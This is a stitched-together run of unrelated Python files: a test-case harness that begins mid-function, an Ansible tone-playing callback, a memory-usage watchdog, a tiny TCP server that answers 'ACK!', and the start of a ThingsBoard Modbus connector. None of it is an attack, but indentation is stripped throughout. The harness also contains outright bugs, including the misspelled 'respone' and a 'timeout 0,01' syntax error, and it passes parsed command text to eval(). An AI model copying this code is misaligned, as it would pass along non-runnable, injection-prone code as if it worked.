block =0
maxcol = len(row)
newrow =[]
while index <maxlen:
for i in range(maxcol):
newrow.append(row[i][block:(block+1)*MAX_LENGTH_OF_CELL])
writer.writerow(newrow)
block+=1
index=block*MAX_LENGTH_OF_CELL
else:
writer.writerow(row)
writer.writerow(['#!---'])
def GetCurrentSutOutputIndex(self,sut):
recordIndex = len(self.RecordReplay)-1
colIndex = 4 + self.SUTNAME.index(sut )
offset = len(self.RecordReplay[recordIndex][colIndex])
return [recordIndex,offset]
def UpdateSutOutput2RecordReplay(self, sutname, data):
self.lockRR.acquire()
colIndex = 4 + self.SUTNAME.index(sutname )
rowIndex = len(self.RecordReplay)-1
while len (self.RecordReplay[rowIndex])<colIndex+2:
self.RecordReplay[rowIndex].append('')
self.RecordReplay[rowIndex][colIndex] = '''%s'''%(str(self.RecordReplay[rowIndex][colIndex])+ data)
self.lockRR.release()
def AddCmd2RecordReplay(self,cmd):
newrecord = cmd[1:]
if cmd[0]=='__case__':
newrecord[0]='''#%s'''%newrecord[0]
else:
newrecord =cmd[:]
while len(newrecord)<4:
newrecord.append('')
for sut in self.SUTNAME:
newrecord.append('')
self.lockOutput.acquire()
self.RecordReplay.append(newrecord)
self.lockOutput.release()
def AddClient(self, clientid):
#lock= threading.Lock()
self.lockOutput.acquire()
self.IndexOfSutOutput.update({clientid:{}})
for sut in self.Session.keys():
self.IndexOfSutOutput[clientid].update({sut:self.GetCurrentSutOutputIndex(sut)})
time.sleep(2)
self.lockOutput.release()
return 'Client %s Added'%clientid
def RequestSUTOutput(self,client, sut):
response = ''
self.lockOutput.acquire()
try:
[recordIndex, offset] = self.IndexOfSutOutput[client][sut]
cRecordIndex = len(self.RecordReplay)-1
index = recordIndex
colIndex =4 + self.SUTNAME.index(sut )
response = self.RecordReplay[index][colIndex][offset:]
index +=1
while cRecordIndex>=index:
response = response + str(self.RecordReplay[index][colIndex]) #[:]
index +=1
self.IndexOfSutOutput[client][sut]=self.GetCurrentSutOutputIndex(sut)
time.sleep(0.2)
except Exception as e:
import traceback
print (traceback.format_exc())
#print('#####'*160)
respone = DumpStack(e)
self.error(response)
self.lockOutput.release()
return response
def QuerySUTOutput(self):
self.info('QuerySUTOutput() is called,')
while self.fActionInProgress:
time.sleep(1)
self.info('QuerySUTOutput(), Expect switchs to search in InteractionBuffer')
for ses in self.SUTs:
try:
self.Session[ses].SetInteractionMode(True)
except Exception as e:
print(traceback.format_exc())
if os.name !='nt':
import pexpect
while (not self.bCaseEnd) and self.flagInteraction :
for sutname in self.SUTs.keys():
acquired =self.lockOutput.acquire()
try:
self.Session[sutname].match=None
if self.InitialDone and (not self.Session[sutname].fSending):
if not acquired:
continue
if os.name =='nt':
try:
try:
getdata =self.Session[sutname].read_until('.*',0.01)
except:
pass
self.Session[sutname].match =self.Session[sutname].InteractionBuffer ##self.Session[sutname].output#
self.Session[sutname].InteractionBuffer=''
except Exception as e:
print('error in interaction buffer')
self.Session[sutname].match =''
else:
import pexpect
self.Session[sutname].expect(['.+',pexpect.TIMEOUT], 0,01)
match = self.Session[sutname].match
output=''
try:
if os.name =='nt':
if match!='':# and match!=pexpect.TIMEOUT :
output = match #match.group().decode("utf-8")
else:
if match and match!=pexpect.TIMEOUT :
output = match.group().decode('utf-8') #match.group().decode("utf-8")
except Exception as e:
self.error(DumpStack(e))
if len(output)>0:
if os.name !='nt':
self.Session[sutname].AppendData2InteractionBuffer(output)
self.UpdateSutOutput2RecordReplay(sutname, output)
except Exception as e:
if str(e.__str__).startswith('End Of File (EOF).'):
try:
self.Session[sutname].SendLine('')
except Exception as e:
self.error(DumpStack(e))
else:
self.error(DumpStack(e))
self.lockOutput.release()
time.sleep(0.49)
print('Query SUT Output ended')
#time.sleep(0.2)
def info(self,msg):
self.logger.info(msg)
self.UpdateSutOutput2RecordReplay('__case__', msg)
def debug(self,msg):
self.logger.debug(msg)
self.UpdateSutOutput2RecordReplay('__case__', msg)
def error(self,msg):
self.logger.error(msg)
self.UpdateSutOutput2RecordReplay('__case__', msg)
def __init__(self,name,suts,steps=None,mode=None,DebugWhenFailed=False,logdir=None,caseconfigfile=None):
"""
init a Test Case instance
"""
self.Name= 'DefaultTestCaseName'
self.SUTs={}
self.Session={}
self.Steps=[[],[],[]]
self.arg =[]
self.kwarg = {}
self.argvs=[]
self.kwargvs =[]
self.ServerHost ='localhost'
self.SocketResponse=''
self.Mode= 'FULL'
self.breakpoint=[[],[],[]]
self.cp=[0,1]
self.qCommand=queue.Queue()
self.RecordReplay=[]
self.IndexOfSutOutput= {'client':{'tel':[0,0]}}
self.SUTNAME =[]
if not steps :
steps = [[],[],[]]
if not mode:
mode ='FULL'
if not logdir:
logdir = os.getcwd()
if not caseconfigfile:
caseconfigfile = './case.cfg'
import threading
self.lockOutput =threading.Lock()
self.lockRR =threading.Lock()
self.DebugWhenFailed=DebugWhenFailed
a = csvfile2array(caseconfigfile)
cfg={}
for i in a:
try:
if len(i)>0:
cfg.update({i[0].strip().lower():i[1].strip()})
except Exception as e:
print(e.__str__())
try:
self.ServerHost = cfg['serverhost']
self.ServerPort = int(cfg['serverport'])
except:
pass
self.Name= name
if len(self.Name)>80:
self.Name=self.Name[0:80]
import re
self.Name = re.sub(r"[^\w]", "", self.Name)
self.LogDir = '%s%s%s'%(os.path.abspath(logdir),os.sep,'%s%s'%(self.Name,time.strftime("_%Y%m%d_%H%M%S", time.localtime())))
#self.LogDir = self.LogDir.replace('\\',os.path.sep).replace('/', os.path.sep).replace(':','')
os.mkdir(self.LogDir)
self.Setup=steps[0]
self.Run = steps[1]
self.Teardown = steps[2]
self.Steps=steps
self.SUTs = suts
self.Mode = mode.upper()
import logging
logfile = self.LogDir+os.sep+"TC_"+self.Name+".log"
logging.basicConfig( level = logging.DEBUG, format = self.Name+' %(asctime)s -%(levelname)s: %(message)s' )
from common import CLogger
self.logger = CLogger(self.Name)
self.hdrlog = logging.FileHandler(logfile)
self.logger.setLevel(logging.DEBUG)
self.hdrlog .setFormatter(logging.Formatter('%(asctime)s -%(levelname)s: %(message)s'))
self.logger.addHandler(self.hdrlog )
sutstring =''
self.SUTNAME= sorted(suts.keys())
self.SUTNAME.append('__case__')
self.RecordReplay = [['[cs]'], ['#VAR'],['#SETUP']]
newrecord = ['#SUTNAME', 'COMMAND', 'EXPECT', 'WAIT TIME(s)']
before1staction= ['#', '','','',]
for sut in self.SUTNAME:
newrecord.append(sut+' OUTPUT')
before1staction.append('')
self.RecordReplay.append(newrecord)
self.RecordReplay.append(before1staction)
thList =[]
for sut in self.SUTs.keys() :
if sut =='__case__':
continue
sutstring +='SUT(%s):[%s]\n'%(sut,self.SUTs[sut])
self.info('connecting to %s'%(sut))
try:
thList.append( threading.Thread(target=self.Connect2Sut,args =[sut]))
thList[-1].start()
except Exception as e:
import traceback
self.info(traceback.format_exc())
print(traceback.format_exc())
raise Exception('Can NOT connected to %s'%sut)
for t in thList:
t.join()
self.InitialDone=True
#print(self.thInteraction)
def troubleshooting(self):
import threading
self.flagInteraction = True
thWebclient=threading.Thread(target=self.QuerySUTOutput,args =[])
thWebclient.start()
def Connect2Sut(self,sutname):
ses =None
sutattr = self.SUTs.get(sutname)
if sutattr["SUT"].strip() =='':
if os.name!='nt':
sutattr['SUT'] ='Session'
else:
sutattr['SUT'] ='WinSession'
classname = sutattr["SUT"]
ModuleName = __import__(classname)
ClassName = ModuleName.__getattribute__(classname)
print('connecting ... to %s'%sutname)
ses= ClassName(sutname, sutattr,logger=self.logger ,logpath = self.LogDir)
self.Session.update({sutname:ses})
print('connected to %s'%sutname)
self.info('connected to to %s'%(sutname))
return ses
def EndCase(self, force=False, killProcess=False):
if self.DebugWhenFailed ==True and self.CaseFailed==True:
return 'case failed! and it is waiting for your debug, if you do want to end this case, please try EndCase(force=True)'
elif self.flagInteraction==True and force==False:
return 'case is in troubleshooting/interaction mode, if you do want to end this case, please try EndCase(force=True)'
savefile =threading.Thread(target=self.SaveCase2File,args =[])
savefile.start()
self.bCaseEnd=True
import time
import os
#if self.thInteraction and self.thInteraction.isAlive():
# time.sleep(1)
#time.sleep(self.MoniterInterval)
for sut in self.Session.keys():
self.Session[sut].EndSession()
from common import csvfile2dict
#runcfg = csvfile2dict('./manualrun.cfg')
#dbname =runcfg.get('db')
#from Database import FetchOne, UpdateRecord
#caseinfo = runcfg.get('caseinfo')
pid = os.getpid()
#UpdateRecord(dbname, caseinfo, """status='ended-closed',end_time=%f"""%(time.time()), "status='running' and pid= %d"%(pid))
#self.logger.info('update database done!')
#self.SaveCase2File()
#if self.Sock:
#self.Sock.shutdown(socket.SHUT_RDWR)
#self.Sock.close()
import signal
try:
if killProcess:
os.kill(os.getpid(), signal.SIGTERM)#exit(0)#
pass
except:
pass
def action(self,sut='__case__', cmd='',expect='.*',timeout=1.0):
self.ActionCheck([sut, cmd,expect ,float(timeout)])
def ActionCheck(self,step=[]):
global reRetry,reNo,reNoWait,reNoAction,reCtrl,reAlt,reCtrlAlt
#for step in steps:
self.info('Start Step:sut(%s), action(%s), expect(%s) within %f'%(step[0],step[1],step[2],float(step[3])))
[sut,cmd,exp,Time]=step[:4]
[fretry,fNoAction,fNo,fNoWait]=[1,False,False,False]
mRetry=re.match(reRetry, cmd)
mCtrl= re.match(reCtrl,cmd)
mAlt = re.match(reAlt,cmd)
mCtrlAlt = re.match(reCtrlAlt,cmd)
fCtrl =False
fAlt= False
if mCtrl:
fCtrl=True
cmd = mCtrl.group(1)
if mAlt:
fAlt=True
cmd = mAlt.group(1)
if mCtrlAlt:
fCtrl=True
fAlt=True
cmd = mCtrlAlt.group(1)
if mRetry:
fretry= int(mRetry.group(1))
cmd = mRetry.group(2)
mNoAction= re.match(reNoAction,cmd)
if mNoAction:
fNoAction=True
mNoWait = re.match(reNoWait,exp)
if mNoWait:
fNoWait=True
exp=mNoWait.group(1)
mNo = re.match(reNo,exp)
if mNo:
fNo=True
exp=mNo.group(1)
s = self.Session[sut]
(ActionIsFunction,action,arg,kwarg) = s.ParseCmdInAction(cmd)
Failure=True
totalretry=fretry
while fretry>1:
fretry= fretry-1
try:
if not fNoAction:
if ActionIsFunction:
s.CallFun(action, arg, kwarg)
Failure=False
break
else:
s.SendLine(command = cmd, Ctrl=fCtrl, Alt=fAlt)
try:
response =s.Expect(exp,Time,fNoWait)
if not fNo:
Failure=False
break
except Exception as e:
if fNo:
Failure=False
break
except Exception as e:
if os.name!='nt':
pass#print ('%d/%d failed'%(totalretry-fretry,totalretry), file=sys.stdout)
else:
print ('%d/%d failed'%(totalretry-fretry,totalretry), sys.stdout)
self.info('%d/%d failed'%(totalretry-fretry,totalretry))
IgnoreExp=False
if Failure:#try last time
if not fNoAction:
if ActionIsFunction:
IgnoreExp=True
s.CallFun(action, arg, kwarg)
Failure=False
else:
s.SendLine(command = cmd, Ctrl=fCtrl, Alt=fAlt)
if IgnoreExp:
return
result=''
if fNo:
foundPattern =False
try:
result = s.Expect(exp,Time,fNoWait)
foundPattern=True
except:
pass
if foundPattern:
self.error('unexpect(%s) found within %f'% (exp, float(Time)))
raise Exception('unexpect(%s) found within %f'% (exp, float(Time)))
else:
self.info('no unexpected pattern (%s) found'%exp)
else:
result = s.Expect(exp,Time,fNoWait)
#print('Expect (%s) found!'%(exp))
#print(result)
def ParseCmdInAction(self,cmd):
IsCallFunction= True
reFunction = re.compile('\s*FUN\s*:\s*(.+?)\s*\(\s*(.*)\s*\)|\s*(.+?)\s*\(\s*(.*)\s*\)',re.IGNORECASE)
m = re.match(reFunction, cmd)
fun =cmd
arg = ""
kwarg ={}
# noinspection PyComparisonWithNone
if m != None :
# noinspection PyComparisonWithNone
if m.group(1) !=None:
fun = m.group(1)
arg = m.group(2)
else:
fun = m.group(3)
arg = m.group(4)
fun = self.__getattribute__(fun)
import inspect
(args, varargs, keywords, defaults) =inspect.getargspec(fun)
try:
parsestr= "self.GetFunArgs(%s)"%((arg))
eval(parsestr)
except Exception as e:
arg.strip()
if re.search(',',arg):
self.argvs =arg.split(',')
elif len(arg.strip())==0:
self.argvs =[]
else:
self.argvs =[self.argvs]
arg =self.argvs
kwarg = self.kwargvs
else:
IsCallFunction = False
fun = cmd
return (IsCallFunction,fun,arg,kwarg)
def GetFunArgs(self,*argvs, **kwargs):
self.argvs=[]
self.kwargvs={}
#re-assign for self.argvs and self.kwargvs
for arg in argvs:
self.argvs.append(arg)
for k in kwargs.keys():
self.kwargvs.update({k:kwargs[k]})
def CallFun(self,functionName,args=[], kwargs={}):
self.fActionInProgress=True
resp = functionName(*args, **kwargs)
#self.info(resp)
self.fActionInProgress=False
# noinspection PyComparisonWithNone
if resp ==None:
return 'Done'
else:
return resp
def pp(self,varname):
return repr(self.__getattribute__(varname)).replace('\\\\n','\n').replace('\\\\r','\r')
def set(self,varname,value):
return self.__setattr__(varname, value)
def SetBreakPoint(self,segment,index):
self.info('SetBreakPoint("%s","%s"'%(segment,str(index)))
segment= segment.upper()
if segment=='SETUP':
segment= 0
elif segment=='RUN':
segment= 1
elif segment=='TEARDOWN':
segment=2
else:
msg= 'segment should be one of [SETUP,RUN, TEARDOWN]'
self.error(msg)
return msg
if index<1:
index =1
self.breakpoint[segment].append(index)
self.breakpoint[segment].sort()
def str2indexSegment(self,segmentstr):
segment= segmentstr.upper()
if segment=='SETUP':
segment= 0
elif segment=='RUN':
segment= 1
elif segment=='TEARDOWN':
segment=2
else:
raise
return segment
def BreakPointCheck(self,segment,index):
segment= segment.upper()
segment =self.str2indexSegment(segment)
if len(self.breakpoint[segment])>0:
self.info('BreakPointCheck("%s","%s")'%(segment,index))
for i in self.breakpoint[segment].sort():
if index==i:
return True
return False
def getIntSegIndex(self,strSegIndex):
global reSegementIndex #=re.compile ('\s*(SETUP|RUN|TEARDOWN)\s*.\s*(\d+)',re.I)
m = re.match(reSegementIndex, strSegIndex)
seg= self.str2indexSegment(m.group(1).upper())
index= int(m.group(2))
if index==-1:
index = len(self.Steps[seg])+1
return seg,index
def cpReset(self):
self.cp = [0,1]
def cpSet(self,seg, index):
self.cp =[seg, index]
strSeg=['setup','run','teardown']
return '%s.%d'%(strSeg[seg],index)
def getCP(self):
strSeg=['setup','run','teardown']
if self.cp[0]>2:
seg, index = self.getIntSegIndex('teardown.-1')
return 'teardown.%d'%(index+1)
return '%s.%d'%(strSeg[self.cp[0]],self.cp[1])
def cpNext(self):
l =len(self.Steps[self.cp[0]])
self.cp[1]+=1
if self.cp[1]>l:
self.cp[1]=1
self.cp[0]+=1
def RunCase(self,mode,startindex,endindex):
self.info('case %s.RunCase(%s,%s,%s)'%(self.Name,mode ,startindex,endindex))
startSeg, startIndex= self.getIntSegIndex(startindex)
endSeg, endIndex= self.getIntSegIndex(endindex)
mode =mode.lower()
self.info('step')
self.cpSet(startSeg, startIndex)
seg=['setup','run','teardown']
while self.IndexInRange(self.getCP(), startindex, endindex):
if self.BreakPointCheck(seg[self.cp[0]], self.cp[1]):
self.flagInteraction=True
while self.flagInteraction:
time.sleep(0.5)
skip=False
if mode =='full':
pass
elif mode =='setupteardown' and self.cp[0]==1:
skip=True
elif mode =='setuprun' and self.cp[0]==2:
skip=True
elif mode =='runteardown' and self.cp[0]==0:
skip=True
elif mode =='setupteardown' and self.cp[0]==1:
skip=True
elif mode =='setup' and self.cp[0]!=0:
skip=True
elif mode =='run' and self.cp[0]!=1:
skip=True
elif mode =='teardown' and self.cp[0]!=2:
skip=True
if not skip:
try:
try:
step = self.Steps[self.cp[0]][self.cp[1]-1]
except Exception as e:
break
self.fRunning=True
print('#'*80)
print('#step (%s.%d)'%(seg[self.cp[0]],int(self.cp[1])))
print('#SUT(%s), Action(%s), Exp(%s), Within (%f)'%(step[0],step[1],step[2],float(step[3])))
self.info('#'*80)
self.info('#step (%s.%d)'%(seg[self.cp[0]],int(self.cp[1])))
self.info('#SUT(%s), Action(%s), Exp(%s), Within (%f)'%(step[0],step[1],step[2],float(step[3])))
if len(step)>4:
print('#%s'%(step[4]))
self.info('#%s'%(step[4]))
print('#'*80)
self.info('#'*80)
self.AddCmd2RecordReplay(step)
self.ActionCheck(step)
except Exception as e:
self.error(DumpStack(e))
if not self.DebugWhenFailed:
self.bCaseEnd=True
import traceback
msg = traceback.format_exc()
print(msg)
raise Exception(msg)
self.fRunning=False
if not self.flagInteraction:
self.bCaseEnd=True
self.cpNext()
self.info('-'*80)
def IndexInRange(self,testIndex,startindex='setup.1',endindex='teardown.-1'):
MAX_ACTION= 65535
startSeg, startIndex= self.getIntSegIndex(startindex)
endSeg, endIndex= self.getIntSegIndex(endindex)
testSeg, testIndex=self.getIntSegIndex(testIndex)
start = startSeg*MAX_ACTION+startIndex
end = endSeg*MAX_ACTION+endIndex
test = testSeg*MAX_ACTION+testIndex
if test>=start and test<=end:
return True
else:
return False
def IsAlive(self):
if self.bCaseEnd:
return False
else:
return True
def CheckCaseResult(self):
if not self.ErrorMessage:
self.ErrorMessage=[]
FailFlag=False
for sesname in self.Session.keys():
ses=self.Session[sesname]
FailFlag+=ses.FailFlag
if ses.ErrorMessage:
print(sesname, ses.ErrorMessage)
self.ErrorMessage.append(['SUT: (%s) ErrorMessage is below:'%(sesname)])
if type(ses.ErrorMessage) == type('string'):
self.ErrorMessage.append(ses.ErrorMessage)
else:
print(sesname, ses.ErrorMessage)
for i in ses.ErrorMessage:
self.ErrorMessage.append(i)
if FailFlag:
resultfilename ='case_result.csv'
self.Write2Csv(self.ErrorMessage,resultfilename)
self.error('case failed ,check detail in file:%s/%s'%(self.LogDir,resultfilename))
raise Exception('case failed ,check detail in file:%s'%resultfilename)
def Write2Csv(self, msgList,CsvFileName=None, path=None):
'''
msgList: if msgList is a list, then each element will be in a cell
if msgList is a string, then all chars will be written to a cell
CSVFileName: a file name, default is None, means to create a SUT_NAME_.csv file, and write msg to it, similiar to SUT_NAME.log
'''
if not path:
import os
path = self.LogDir
from common import array2csvfile
csvfile = '%s/result.csv'%path
arrayToBeWritten = msgList
if CsvFileName:
if CsvFileName.find('\\')!=-1 or CsvFileName.find('/')!=-1:
csvfile = CsvFileName
else:
csvfile = os.path.sep.join([path,CsvFileName])
array2csvfile(arrayToBeWritten, csvfile)
|
tones.py | # (c) 2012, Michael DeHaan, <michael.dehaan@gmail.com>
# (c) 2017 Ansible Project
# (c) 2019 Jeff Geerling
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
DOCUMENTATION = '''
callback: tones
type: notification
requirements:
- whitelisting in configuration
- the SoX command line program ('brew install sox' on macOS)
short_description: play a note using software synthesizer
version_added: N/A
description:
- This plugin will use the SoX program to play notes for tasks.
'''
import distutils.spawn
import platform
import subprocess
import os
import threading
import time
from ansible.plugins.callback import CallbackBase
class CallbackModule(CallbackBase):
"""
makes Ansible much more exciting.
"""
CALLBACK_VERSION = 2.0
CALLBACK_TYPE = 'notification'
CALLBACK_NAME = 'tones'
CALLBACK_NEEDS_WHITELIST = True
def __init__(self):
super(CallbackModule, self).__init__()
self.synthesizer = distutils.spawn.find_executable('play')
# plugin disable itself if play is not present
# ansible will not call any callback if disabled is set to True
if not self.synthesizer:
self.disabled = True
self._display.warning("Unable to find 'play' executable, plugin %s disabled" % os.path.basename(__file__))
def tone(self, tone, length, delay):
cmd = [self.synthesizer]
if tone:
time.sleep(delay)
cmd.extend(('-q', '-n', 'synth', length, 'sin', tone))
subprocess.call(cmd)
def playbook_on_task_start(self, name, is_conditional):
# define some defaults
length = '0.75'
delay = 0.5
notes = {
'G5': '783.99',
'A5': '880.00',
'F5': '698.46',
'F4': '349.23',
'C5': '523.25'
}
if name == 'C5':
length = '1.25'
# play the tone if it exists
if name in notes.keys():
thread = threading.Thread(target=self.tone, args=(notes[name], length, delay))
thread.daemon = True
thread.start()
|
profiling.py |
import gc
import json
import logging
import os
import sys
import threading
import time
import objgraph
import psutil
def start_mem_check_thread(threshold=1024 * 1024 * 1024,
gc=False,
size_range=None,
interval=1
):
"""
Start a thread in background and in daemon mode, to watch memory usage.
If memory this process is using beyond `threshold`, a memory usage profile
is made and is written to root logger. And process is aborted.
`threshold`: maximum memory a process can use before abort.
`gc`: whether to run gc every time before checking memory usage.
`size_range`: in tuple, dump only object of size in this range.
`interval`: memory check interval.
"""
options = {
'threshold': threshold,
'gc': gc,
'size_range': size_range,
'interval': interval,
}
th = threading.Thread(target=mem_check, args=(options,))
th.daemon = True
th.start()
return th
def mem_check(opts):
while True:
if opts['gc']:
try:
gc.collect()
except Exception as e:
logging.exception(repr(e) + ' while gc.collect()')
try:
rss = psutil.Process(os.getpid()).memory_info().rss
logging.info('current memory used: {rss}'.format(rss=rss))
if rss > opts['threshold']:
memory_dump(opts)
os.abort()
except Exception as e:
logging.exception(repr(e) + ' while checking memory usage')
finally:
time.sleep(opts['interval'])
def memory_dump(opts):
try:
_memory_dump(opts)
except Exception as e:
logging.exception(repr(e))
def _memory_dump(opts):
for typ, n in objgraph.most_common_types():
logging.info('{typ:30} {n:>10}'.format(typ=typ, n=n))
objects = []
rng = opts['size_range']
summ = {
'max_refsize': {
'size': 0,
},
}
for obj in gc.get_objects():
if not hasattr(obj, '__class__'):
continue
size = sys.getsizeof(obj, 0)
if rng is not None:
if not (rng[0] <= size < rng[1]):
continue
i = id(obj)
# referrers = [id(o)
# for o in gc.get_referrers(obj)
# if hasattr(o, '__class__')]
referents = [(id(o), _get_class(o), sys.getsizeof(o, 0))
for o in gc.get_referents(obj)
# if hasattr(o, '__class__')
]
refsize = sum([x[2] for x in referents])
cls = _get_class(obj)
data = [
i,
cls,
size, # object size
refsize, # size of all direct referents
referents, # referents
]
objects.append(data)
if summ['max_refsize']['size'] < refsize:
summ['max_refsize'] = {
'size': refsize,
'object': data,
}
for o in objects:
logging.info('memory-dump: ' + json.dumps(o))
logging.info('memory-dump summary: ' + json.dumps(summ))
def _get_class(obj):
if hasattr(obj, '__class__') and hasattr(obj.__class__, '__name__'):
cls = obj.__class__.__name__
else:
cls = str(type(obj))
return cls
if __name__ == "__main__":
logging.basicConfig(level='DEBUG',
format='%(asctime)s,%(name)s,%(levelname)s %(message)s',
datefmt='%H:%M:%S'
)
rss = psutil.Process(os.getpid()).memory_info().rss
logging.info('initial mem:' + repr(rss))
start_mem_check_thread(threshold=rss + 1024 * 100,
interval=0.1)
a = []
logging.info('a: ' + str(id(a)))
while True:
a.append(str(int(time.time() * 1000)) * 100)
time.sleep(0.001)
|
tcpserver.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import socket
import threading
bind_ip = '0.0.0.0'
port = 80
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind((bind_ip, port))
server.listen(5)
print("[*] Server listening on {}:{}".format(bind_ip, port))
def handle(client_socket):
request = client_socket.recv(1024)
print("[*] Recieved {} ".format(request))
client_socket.send("ACK!")
client_socket.close()
while True:
client, addr = server.accept()
print("[*] Accepted connection from {}:{}".format(addr[0], addr[1]))
handler = threading.Thread(target=handle, args=(client,))
handler.start()
|
modbus_connector.py | # Copyright 2021. ThingsBoard
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import threading
import time
from queue import Queue
from random import choice
from string import ascii_lowercase
from thingsboard_gateway.tb_utility.tb_loader import TBModuleLoader
from thingsboard_gateway.tb_utility.tb_utility import TBUtility
# Try import Pymodbus library or install it and import
try:
from pymodbus.constants import Defaults
except ImportError:
print("Modbus library not found - installing...")
TBUtility.install_package("pymodbus", ">=2.3.0")
TBUtility.install_package('pyserial')
from pymodbus.constants import Defaults
from pymodbus.client.sync import ModbusTcpClient, ModbusUdpClient, ModbusSerialClient, ModbusRtuFramer, \
ModbusSocketFramer
from pymodbus.bit_write_message import WriteSingleCoilResponse, WriteMultipleCoilsResponse
from pymodbus.register_write_message import WriteMultipleRegistersResponse, WriteSingleRegisterResponse
from pymodbus.register_read_message import ReadRegistersResponseBase
from pymodbus.bit_read_message import ReadBitsResponseBase
from pymodbus.exceptions import ConnectionException
from thingsboard_gateway.connectors.connector import Connector, log
from thingsboard_gateway.connectors.modbus.constants import *
from thingsboard_gateway.connectors.modbus.bytes_modbus_uplink_converter import BytesModbusUplinkConverter
from thingsboard_gateway.connectors.modbus.bytes_modbus_downlink_converter import BytesModbusDownlinkConverter
CONVERTED_DATA_SECTIONS = [ATTRIBUTES_PARAMETER, TELEMETRY_PARAMETER]
class ModbusConnector(Connector, threading.Thread):
def __init__(self, gateway, config, connector_type):
self.statistics = {STATISTIC_MESSAGE_RECEIVED_PARAMETER: 0,
STATISTIC_MESSAGE_SENT_PARAMETER: 0}
super().__init__()
self.__gateway = gateway
self._connector_type = connector_type
self.__config = config.get(CONFIG_SERVER_SECTION_PARAMETER)
self.__previous_master_config = dict()
self.__current_master, self.__available_functions = self.__configure_master()
self.__default_config_parameters = [HOST_PARAMETER,
PORT_PARAMETER,
BAUDRATE_PARAMETER,
TIMEOUT_PARAMETER,
METHOD_PARAMETER,
STOPBITS_PARAMETER,
BYTESIZE_PARAMETER,
PARITY_PARAMETER,
STRICT_PARAMETER,
TYPE_PARAMETER]
self.__byte_order = self.__config.get(BYTE_ORDER_PARAMETER)
self.__word_order = self.__config.get(WORD_ORDER_PARAMETER)
self.__devices = {}
self.setName(self.__config.get("name", 'Modbus Default ' + ''.join(choice(ascii_lowercase) for _ in range(5))))
self.__load_converters()
self.__connected = False
self.__stopped = False
self.daemon = True
self.__data_to_convert_queue = Queue()
def is_connected(self):
return self.__connected
def open(self):
self.__stopped = False
self.start()
log.info("Starting Modbus connector")
def run(self):
self.__connected = True
while True:
time.sleep(.01)
self.__process_devices()
if not self.__data_to_convert_queue.empty():
for _ in range(self.__data_to_convert_queue.qsize()):
thread = threading.Thread(target=self.__convert_and_save_data, args=(self.__data_to_convert_queue,),
daemon=True)
thread.start()
if self.__stopped:
break
def __convert_and_save_data(self, queue):
device, current_device_config, config, device_responses = queue.get()
converted_data = {}
try:
converted_data = self.__devices[device][UPLINK_PREFIX + CONVERTER_PARAMETER].convert(
config=config,
data=device_responses)
except Exception as e:
log.error(e)
to_send = {DEVICE_NAME_PARAMETER: converted_data[DEVICE_NAME_PARAMETER],
DEVICE_TYPE_PARAMETER: converted_data[DEVICE_TYPE_PARAMETER],
TELEMETRY_PARAMETER: [],
ATTRIBUTES_PARAMETER: []
}
if current_device_config.get(SEND_DATA_ONLY_ON_CHANGE_PARAMETER):
self.statistics[STATISTIC_MESSAGE_RECEIVED_PARAMETER] += 1
for converted_data_section in CONVERTED_DATA_SECTIONS:
for current_section_dict in converted_data[converted_data_section]:
for key, value in current_section_dict.items():
if self.__devices[device][LAST_PREFIX + converted_data_section].get(key) is None or \
self.__devices[device][LAST_PREFIX + converted_data_section][key] != value:
self.__devices[device][LAST_PREFIX + converted_data_section][key] = value
to_send[converted_data_section].append({key: value})
elif converted_data and current_device_config.get(SEND_DATA_ONLY_ON_CHANGE_PARAMETER) is None or \
not current_device_config.get(SEND_DATA_ONLY_ON_CHANGE_PARAMETER):
self.statistics[STATISTIC_MESSAGE_RECEIVED_PARAMETER] += 1
for converted_data_section in CONVERTED_DATA_SECTIONS:
self.__devices[device][LAST_PREFIX + converted_data_section] = converted_data[
converted_data_section]
to_send[converted_data_section] = converted_data[converted_data_section]
if to_send.get(ATTRIBUTES_PARAMETER) or to_send.get(TELEMETRY_PARAMETER):
self.__gateway.send_to_storage(self.get_name(), to_send)
self.statistics[STATISTIC_MESSAGE_SENT_PARAMETER] += 1
def __load_converters(self):
try:
for device in self.__config[CONFIG_DEVICES_SECTION_PARAMETER]:
if self.__config.get(UPLINK_PREFIX + CONVERTER_PARAMETER) is not None:
converter = TBModuleLoader.import_module(self._connector_type,
self.__config[UPLINK_PREFIX + CONVERTER_PARAMETER])(device)
else:
converter = BytesModbusUplinkConverter(device)
if self.__config.get(DOWNLINK_PREFIX + CONVERTER_PARAMETER) is not None:
downlink_converter = TBModuleLoader.import_module(self._connector_type, self.__config[
DOWNLINK_PREFIX + CONVERTER_PARAMETER])(device)
else:
downlink_converter = BytesModbusDownlinkConverter(device)
if device.get(DEVICE_NAME_PARAMETER) not in self.__gateway.get_devices():
self.__gateway.add_device(device.get(DEVICE_NAME_PARAMETER), {CONNECTOR_PARAMETER: self},
device_type=device.get(DEVICE_TYPE_PARAMETER))
self.__devices[device[DEVICE_NAME_PARAMETER]] = {CONFIG_SECTION_PARAMETER: device,
UPLINK_PREFIX + CONVERTER_PARAMETER: converter,
DOWNLINK_PREFIX + CONVERTER_PARAMETER: downlink_converter,
NEXT_PREFIX + ATTRIBUTES_PARAMETER + CHECK_POSTFIX: 0,
NEXT_PREFIX + TIMESERIES_PARAMETER + CHECK_POSTFIX: 0,
TELEMETRY_PARAMETER: {},
ATTRIBUTES_PARAMETER: {},
LAST_PREFIX + TELEMETRY_PARAMETER: {},
LAST_PREFIX + ATTRIBUTES_PARAMETER: {},
CONNECTION_ATTEMPT_PARAMETER: 0
}
except Exception as e:
log.exception(e)
def close(self):
self.__stopped = True
self.__stop_connections_to_masters()
log.info('%s has been stopped.', self.get_name())
def get_name(self):
return self.name
def __process_devices(self):
for device in self.__devices:
current_time = time.time()
device_responses = {TIMESERIES_PARAMETER: {},
ATTRIBUTES_PARAMETER: {},
}
current_device_config = {}
try:
for config_section in device_responses:
if self.__devices[device][CONFIG_SECTION_PARAMETER].get(config_section) is not None:
